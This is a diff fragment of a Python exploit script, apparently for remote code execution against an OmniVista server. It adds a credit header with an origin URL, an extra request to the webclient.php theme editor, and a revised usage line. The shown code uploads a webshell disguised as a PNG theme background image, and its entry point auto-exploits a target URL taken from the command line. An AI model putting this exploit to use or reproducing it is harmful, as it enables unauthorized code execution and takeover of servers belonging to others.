|
@@ -1,3 +1,7 @@
|
|
|
+'''
|
|
|
+Original url: https://git.lsd.cat/g/omnivista-rce
|
|
|
+Website: https://lsd.cat
|
|
|
+'''
|
|
|
import requests
|
|
|
import socket
|
|
|
import ldap
|
|
@@ -90,6 +94,7 @@ class OmniVista:
|
|
|
return True
|
|
|
|
|
|
def exploit8770(self):
|
|
|
+ r = self.session.get(self.host + 'php-bin/webclient.php', params = {'action': 'editTheme', 'themeId': "2"}, verify=False)
|
|
|
r = self.session.post(self.host + 'php-bin/webclient.php',
|
|
|
data = {"action": "saveTheme", "themeId": "2"},
|
|
|
files = { "BgImg1": (self.filename, self.webshell, "image/png")},
|
|
@@ -151,7 +156,7 @@ class OmniVista:
|
|
|
return False
|
|
|
|
|
|
if len(sys.argv) != 2:
|
|
|
- print("Usage: ./omnivista.py http(s)://target.tld")
|
|
|
+ print("Usage: ./omnivista.py http(s)://target.tld:port/")
|
|
|
else:
|
|
|
exploit = OmniVista(sys.argv[1])
|
|
|
exploit.autoexploit()
|